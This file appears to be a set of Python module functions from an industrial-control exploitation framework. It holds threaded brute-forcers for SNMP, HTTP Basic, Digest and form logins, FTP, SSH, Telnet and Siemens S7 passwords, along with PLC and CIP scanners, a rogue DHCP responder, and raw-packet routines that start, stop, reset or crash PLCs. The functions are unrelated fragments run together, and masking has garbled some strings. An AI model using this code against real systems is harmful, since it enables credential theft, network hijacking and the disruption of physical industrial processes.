def run(self): if self._check_alive(): print_success("Target is alive") print_status("Sending packet to target") self.exploit() else: print_error("Target is not alive")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name print_status(name, 'thread is starting...', verbose=module_verbosity) cmdGen = cmdgen.CommandGenerator() while running.is_set(): try: string = data.next().strip() errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd( cmdgen.CommunityData(string, mpModel=self.version - 1), cmdgen.UdpTransportTarget((self.target, self.port)), '1.3.6.1.2.1.1.1.0', ) if errorIndication or errorStatus: print_error( "Target: {}:{} {}: Invalid community string - String: '{}'" .format(self.target, self.port, name, string), verbose=module_verbosity) else: if boolify(self.stop_on_success): running.clear() print_success( "Target: {}:{} {}: Valid community string found - String: '{}'" .format(self.target, self.port, name, string), verbose=module_verbosity) self.strings.append((self.target, self.port, string)) except StopIteration: break print_status(name, 'thread is terminated.', verbose=module_verbosity)
def attack(self): url = "{}:{}{}".format(self.target, self.port, self.path) response = http_request(method="GET", url=url) if response is None: return if response.status_code != 401: print_status("Target is not protected by Basic Auth") return if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = itertools.product(usernames, passwords) with threads.ThreadPoolExecutor(self.threads) as executor: for record in collection: executor.submit(self.target_function, url, record) if self.credentials: print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def run(self): conf.verb = self.verbose self.sniff_mac_address = get_if_hwaddr(self.nic) self.scan_target_ip(self.target) if len(self.result) == 0: print_error("Didn't find any device, please check target mac address.") return print_status("Please make sure target device info is correct.") print_status("Do you want setup target with\n ip address: %s\n network mask: %s\n gateway:%s\n" % ( self.target_ip, self.target_netmask, self.target_gateway )) ans = raw_input("Y/y to confirm, other to cancel.\n:") if ans.upper() == "Y": self.exploit(target_mac=self.target) self.scan_target_ip(self.target) # TODO: need some other method to check setup is success or not. if len(self.result) == 0: print_error("Setup target ip failed.") return if self.result[0][3] != self.target_ip \ or self.result[0][4] != self.target_netmask \ or self.result[0][5] != self.target_gateway: print_error("Setup target ip failed.") return else: print_success("Setup target ip succeeded")
def get_target_info(self, host, port): for rack_num in range(self.min_rack, self.max_rack + 1): for slot_num in range(self.min_slot, self.max_slot + 1): print_status("Tring to scan %s with Rack%s/Slot%s" % (host, rack_num, slot_num)) order_code = '' firmware_version = '' module_type_name = '' module_name = '' serial_number = '' ip_address = host try: target = S7Client(name='S7Scanner', ip=host, port=port, rack=rack_num, slot=slot_num) target.connect() order_code, firmware_version, module_type_name, \ as_name, module_name, serial_number = target.get_target_info() ip_address = host if order_code != '': self.result.append([ order_code, module_type_name, firmware_version, module_name, serial_number, str(rack_num) + '/' + str(slot_num), ip_address ]) except Exception as err: print_error(err) return False
def attack(self): url = "{}:{}{}".format(self.target, self.port, self.path) response = http_request("GET", url) if response is None: return if response.status_code != 401: print_status("Target is not protected by Digest Auth") return if self.defaults.startswith('file://'): defaults = open(self.defaults[7:], 'r') else: defaults = [self.defaults] with ThreadPoolExecutor(self.threads) as executor: for record in defaults: username, password = record.split(':') executor.submit(self.target_function, url, username, password) if self.credentials: print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found") defaults.close()
def get_target_info(self, host, port): product_name = '' device_type = '' vendor = '' revision = '' serial_number = '' slot = '' ip_address = host target = CIPClient(name='CIP_Scanner', ip=host, port=port) target.connect() for slot_num in range(self.max_slot + 1): print_status("Tring to scan %s with Slot%s" % (host, slot_num)) try: product_name, device_type, vendor, revision, serial_number = \ target.get_target_info(port_segment=slot_num) print(product_name, device_type, vendor, revision, serial_number) slot = slot_num ip_address = host if serial_number != '': self.result.append([ product_name, device_type, vendor, revision, serial_number, str(slot), ip_address ]) except Exception as err: print_error(err) return False
def detect_dhcp(self, pkt): # If DHCP Discover then DHCP Offer if pkt[DHCP] and pkt[DHCP].options[0][1] == 1: print_status("DHCP Discover packet detected with mac address:%s" % pkt.src) client_ip = self.chose_ip_to_offer(pkt.src) if client_ip: packet = Ether(src=self.server_mac, dst="ff:ff:ff:ff:ff:ff") / \ IP(src=self.dhcp_server_ip, dst="255.255.255.255") / \ UDP(sport=67, dport=68) / \ BOOTP( op=2, yiaddr=client_ip, siaddr=self.client_gateway, # giaddr=server_ip, chaddr=pkt.src, xid=pkt[BOOTP].xid, sname='DHCPServer' ) / \ DHCP(options=[('message-type', 'offer')]) / \ DHCP(options=[('subnet_mask', self.client_net_mask)]) / \ DHCP(options=[('name_server', self.client_dns)]) / \ DHCP(options=[('server_id', self.dhcp_server_ip), ('end')]) sendp(packet, iface=self.nic) print_success("DHCP Offer packet sent.") print_success( "DHCP Offer to target:%s\nIP:%s\nNetMask:%s\nGateWay:%s\nDNS:%s.\n" % (pkt.src, client_ip, self.client_net_mask, self.client_gateway, self.client_dns)) # If DHCP Request then DHCP Ack if pkt[DHCP] and pkt[DHCP].options[0][1] == 3: print_status("DHCP Request packet detected with mac address:%s" % pkt.src) client_ip = self.chose_ip_to_offer(pkt.src) if client_ip: packet = Ether(src=self.server_mac, dst=pkt.src) / \ IP(src=self.dhcp_server_ip, dst=client_ip) / \ UDP(sport=67, dport=68) / \ BOOTP(op=2, yiaddr=client_ip, siaddr=self.dhcp_server_ip, giaddr=self.client_gateway, chaddr=pkt.src, xid=pkt[BOOTP].xid ) / \ DHCP(options=[('message-type', 'ack')]) / \ DHCP(options=[('subnet_mask', self.client_net_mask)]) / \ DHCP(options=[('name_server', self.client_dns)]) / \ DHCP(options=[('server_id', self.dhcp_server_ip), ('end')]) sendp(packet, iface=self.nic) print_success( "DHCP Ack to target:%s\nIP:%s\nNetMask:%s\nGateWay:%s\nDNS:%s." % (pkt.src, client_ip, self.client_net_mask, self.client_gateway, self.client_dns)) print_success("DHCP Ack packet sent\n\nCtrl+C to exit\n")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name print_status(name, 'process is starting...', verbose=module_verbosity) ftp = ftplib.FTP() while running.is_set(): try: user, password = data.next() user = user.strip() password = password.strip() except StopIteration: break else: retries = 0 while retries < 3: try: ftp.connect(self.target, port=int(self.port), timeout=10) break except (socket.error, socket.timeout): print_error( "{} Connection problem. Retrying...".format(name), verbose=module_verbosity) retries += 1 if retries > 2: print_error( "Too much connection problems. Quiting...", verbose=module_verbosity) return try: ftp.login(user, password) if boolify(self.stop_on_success): running.clear() print_success( "Target: {}:{} {}: Authentication succeed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append( (self.target, self.port, user, password)) except: print_error( "Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) ftp.close() print_status(name, 'process is terminated.', verbose=module_verbosity)
def attack(self): url = sanitize_url("{}:{}{}".format(self.target, self.port, self.get_form_path())) try: requests.get(url, verify=False) except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): print_error("Invalid URL format: %s" % url) return except requests.exceptions.ConnectionError: print_error("Connection error: %s" % url) return # authentication type if self.form == 'auto': form_data = self.detect_form() if form_data is None: print_error("Could not detect form") return (form_action, self.data) = form_data if form_action: self.path = form_action else: self.data = self.form print_status("Using following data: ", self.data) # invalid authentication self.invalid_auth() # running threads if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = LockedIterator(itertools.product(usernames, passwords)) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def exploit(self): self.sock = socket.socket() self.sock.connect((self.target, self.port)) self.create_connect(self.slot) if self.command == 1: print_status("Start plc") self.sock.send(cpu_start_payload) elif self.command == 2: print_status("Stop plc") self.sock.send(cpu_stop_payload) else: print_error("Command %s didn't support" % self.command)
def run(self): if self._check_alive(): print_success("RPC port is open") print_status("Sending packet to target") self.exploit() time.sleep(3) # wait target crash if not self._check_alive(): print_success("Target is down") else: print_error("Target is not vulnerable") else: print_error("Target is not vulnerable") return
def exploit(self): self.sock = socket.socket() self.sock.settimeout(3) self.sock.connect((self.target, self.port)) if self.get_session(): if self.command == 1: print_status("Start plc") buff = ('015300000006005a' + self.session + '40ff00').decode('hex') self.sock.send(buff) elif self.command == 2: print_status("Stop plc") buff = ('015800000006005a' + self.session + '41ff00').decode('hex') self.sock.send(buff) else: print_error("Command %s didn't support" % self.command) else: print_error("Can't get session, stop exploit.")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) headers = {u'Content-Type': u'application/x-www-form-urlencoded'} print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: user, password = data.next() user = user.strip() password = password.strip() postdata = self.data.replace("{{USER}}", user).replace( "{{PASS}}", password) r = requests.post(url, headers=headers, data=postdata, verify=False) l = len(r.text) if l < self.invalid["min"] or l > self.invalid["max"]: if boolify(self.stop_on_success): running.clear() print_success( "Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append( (self.target, self.port, user, password)) else: print_error( name, "Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def scan(self, protocol): nm = nmap.PortScanner() try: if protocol == "tcp" or protocol == "TCP": nm.scan(hosts=self.target, ports=str(self.port), arguments='-n -sT ') return nm elif protocol == "udp" or protocol == "UDP": print_status( "UDP Scan requires root privileges will using sudo to scan target " ) nm.scan(hosts=self.target, ports=str(self.port), arguments='-n -sU ', sudo=True) return nm except Exception as err: print_error(err) return None
def target_function(self, running, data): module_verbosity = boolify(self.verbose) name = threading.current_thread().name print_status(name, 'thread is starting...', verbose=module_verbosity) s7_client = S7Client(name="Siemens PLC", ip=self.target, rack=self.rack, slot=self.slot) s7_client.connect() if not module_verbosity: s7_client.logger.setLevel(50) while running.is_set(): try: string = data.next().strip() if len(string) > 8: continue s7_client.check_privilege() if s7_client.protect_level == 1: print_error("Target didn't set password.") return s7_client.auth(string) if s7_client.authorized: if boolify(self.stop_on_success): running.clear() print_success( "Target: {}:{} {}: Valid password string found - String: '{}'" .format(self.target, self.port, name, string), verbose=module_verbosity) self.strings.append((self.target, self.port, string)) else: print_error( "Target: {}:{} {}: Invalid community string - String: '{}'" .format(self.target, self.port, name, string), verbose=module_verbosity) except StopIteration: break print_status(name, 'thread is terminated.', verbose=module_verbosity)
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: line = data.next().split(":") user = line[0].strip() password = line[1].strip() ssh.connect(self.target, int(self.port), timeout=5, username=user, password=password) except StopIteration: break except paramiko.ssh_exception.SSHException as err: ssh.close() print_error( "Target: {}:{} {}: {} Username: '******' Password: '******'". format(self.target, self.port, name, err, user, password), verbose=module_verbosity) else: if boolify(self.stop_on_success): running.clear() print_success( "Target: {}:{} {} Authentication Succeed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append( (self.target, self.port, user, password)) print_status(name, 'process is terminated.', verbose=module_verbosity)
def exploit(self): if self.command == 0: print_status("Start plc") self.start_ctrl(start_cpu_packet) elif self.command == 1: print_status("Stop plc") self.start_ctrl(stop_cpu_packet) elif self.command == 2: print_status("reset plc") self.start_ctrl(stop_cpu_packet) time.sleep(0.5) self.start_ctrl(reset_cpu_packet) elif self.command == 3: print_status("reset plc and ip") self.start_ctrl(stop_cpu_packet) time.sleep(0.5) self.start_ctrl(reset_cpu_and_ip_packet) else: print_error("Command %s didn't support" % self.command)
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name print_status(name, 'thread is starting...', verbose=module_verbosity) while running.is_set(): try: user, password = data.next() user = user.strip() password = password.strip() except StopIteration: break else: retries = 0 while retries < 3: try: tn = telnetlib.Telnet(self.target, self.port) tn.expect(["Login: "******"login: "******"\r\n") tn.expect(["Password: "******"password"], 5) tn.write(password + "\r\n") tn.write("\r\n") (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) tn.close() if i != -1: print_error( "Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) else: if any(map(lambda x: x in res, [ "#", "$", ">" ])) or len(res) > 500: # big banner e.g. mikrotik if boolify(self.stop_on_success): running.clear() print_success( "Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append( (self.target, self.port, user, password)) tn.close() break except EOFError: print_error(name, "Connection problem. Retrying...", verbose=module_verbosity) retries += 1 if retries > 2: print_error( "Too much connection problems. Quiting...", verbose=module_verbosity) return continue print_status(name, 'thread is terminated.', verbose=module_verbosity)